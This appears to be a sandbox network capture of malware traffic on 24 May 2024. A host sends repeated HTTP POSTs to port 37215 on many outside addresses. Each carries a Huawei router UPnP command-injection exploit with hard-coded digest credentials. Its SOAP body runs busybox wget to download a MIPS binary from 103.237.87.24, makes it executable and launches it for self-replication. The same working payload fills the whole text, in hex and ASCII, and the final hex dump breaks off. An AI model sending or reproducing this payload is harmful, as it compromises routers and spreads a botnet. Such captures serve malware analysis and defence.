                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2361192.168.2.134481241.84.248.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624372005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2362192.168.2.134441841.249.90.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624377966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2363192.168.2.135543853.231.8.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624398947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2364192.168.2.1346136157.219.146.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624403000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2365192.168.2.135000641.126.81.25337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624413013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2366192.168.2.13506725.137.220.13837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624437094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2367192.168.2.1354396197.26.134.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624444962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2368192.168.2.1335142157.217.53.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624444962 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2369192.168.2.1334670197.215.107.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624450922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2370192.168.2.1347828197.0.252.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.624450922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 